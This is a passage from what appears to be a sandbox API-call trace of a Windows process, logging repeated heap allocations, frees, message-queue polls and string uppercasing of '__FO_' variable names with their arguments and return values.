lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.154] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.154] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.154] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.154] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.154] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c70 [0261.154] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69c70 | out: hHeap=0xc60000) returned 1 [0261.154] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.154] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79388 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79340 [0261.154] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.155] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c70 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d00 [0261.155] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79310 | out: hHeap=0xc60000) returned 1 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c98 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79310 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79250 [0261.155] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d10 [0261.155] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79250 | out: hHeap=0xc60000) returned 1 [0261.155] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d10 | out: hHeap=0xc60000) returned 1 [0261.155] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69cc0 [0261.155] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79250 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d10 [0261.156] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79250 | out: hHeap=0xc60000) returned 1 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ce8 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79250 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79238 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d20 [0261.156] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79238 | out: hHeap=0xc60000) returned 1 [0261.156] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d20 | out: hHeap=0xc60000) returned 1 [0261.156] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d10 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79238 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d20 [0261.156] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79238 | out: hHeap=0xc60000) returned 1 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d38 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79238 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793b8 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d30 [0261.156] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793b8 | out: hHeap=0xc60000) returned 1 [0261.156] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d30 | out: hHeap=0xc60000) returned 1 [0261.156] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d60 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793b8 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d30 [0261.156] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793b8 | out: hHeap=0xc60000) returned 1 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69d88 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793b8 [0261.156] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793d0 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d40 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793d0 | out: hHeap=0xc60000) returned 1 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d40 | out: hHeap=0xc60000) returned 1 [0261.157] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69db0 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793d0 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d40 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793d0 | out: hHeap=0xc60000) returned 1 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793d0 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d50 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d60 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69dd8 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d60 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79400 [0261.157] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d60 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79400 | out: hHeap=0xc60000) returned 1 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69dd8 | out: hHeap=0xc60000) returned 1 [0261.157] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d50 | out: hHeap=0xc60000) returned 1 [0261.158] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69dd8 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79400 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d50 [0261.158] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79400 | out: hHeap=0xc60000) returned 1 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e00 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79400 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d60 [0261.158] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0261.158] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d60 | out: hHeap=0xc60000) returned 1 [0261.158] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e28 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d60 [0261.158] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd793e8 | out: hHeap=0xc60000) returned 1 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ed68 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd793e8 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79418 [0261.158] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d70 [0261.159] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79418 | out: hHeap=0xc60000) returned 1 [0261.159] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d70 | out: hHeap=0xc60000) returned 1 [0261.159] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e50 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79418 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d70 [0261.159] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79418 | out: hHeap=0xc60000) returned 1 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee48 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79418 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79430 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d80 [0261.159] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79430 | out: hHeap=0xc60000) returned 1 [0261.159] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d80 | out: hHeap=0xc60000) returned 1 [0261.159] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69e78 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79430 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d80 [0261.159] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79430 | out: hHeap=0xc60000) returned 1 [0261.159] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee80 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79430 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75d90 [0261.160] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ea0 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75da0 [0261.160] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75da0 | out: hHeap=0xc60000) returned 1 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79460 [0261.160] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75da0 [0261.160] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75da0 | out: hHeap=0xc60000) returned 1 [0261.160] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0261.160] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79460 | out: hHeap=0xc60000) returned 1 [0261.160] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69ea0 | out: hHeap=0xc60000) returned 1 [0261.160] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75d90 | out: hHeap=0xc60000) returned 1 [0261.161] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ea0 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79460 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75d90 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79460 | out: hHeap=0xc60000) returned 1 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ec8 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79460 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75da0 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ef0 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79490 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79478 | out: hHeap=0xc60000) returned 1 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79490 | out: hHeap=0xc60000) returned 1 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69ef0 | out: hHeap=0xc60000) returned 1 [0261.161] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75da0 | out: hHeap=0xc60000) returned 1 [0261.161] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.161] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69ef0 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79490 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75da0 [0261.162] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79490 | out: hHeap=0xc60000) returned 1 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f18 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79490 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75db0 [0261.162] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79478 | out: hHeap=0xc60000) returned 1 [0261.162] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75db0 | out: hHeap=0xc60000) returned 1 [0261.162] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f40 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75db0 [0261.162] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79478 | out: hHeap=0xc60000) returned 1 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f68 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79478 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75dc0 [0261.162] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0261.162] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75dc0 | out: hHeap=0xc60000) returned 1 [0261.162] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69f90 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75dc0 [0261.162] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79448 | out: hHeap=0xc60000) returned 1 [0261.162] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69fb8 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79448 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794a8 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75dd0 [0261.163] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794a8 | out: hHeap=0xc60000) returned 1 [0261.163] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75dd0 | out: hHeap=0xc60000) returned 1 [0261.163] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69fe0 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794a8 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75dd0 [0261.163] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794a8 | out: hHeap=0xc60000) returned 1 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a008 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794a8 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794c0 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75de0 [0261.163] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794c0 | out: hHeap=0xc60000) returned 1 [0261.163] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75de0 | out: hHeap=0xc60000) returned 1 [0261.163] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a030 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794c0 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75de0 [0261.163] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794c0 | out: hHeap=0xc60000) returned 1 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7eeb8 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794c0 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794d8 [0261.163] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75df0 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794d8 | out: hHeap=0xc60000) returned 1 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75df0 | out: hHeap=0xc60000) returned 1 [0261.164] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a058 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794d8 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75df0 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794d8 | out: hHeap=0xc60000) returned 1 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7eef0 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794d8 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd794f0 [0261.164] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e00 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd794f0 | out: hHeap=0xc60000) returned 1 [0261.164] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e00 | out: hHeap=0xc60000) returned 1 [0261.164] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 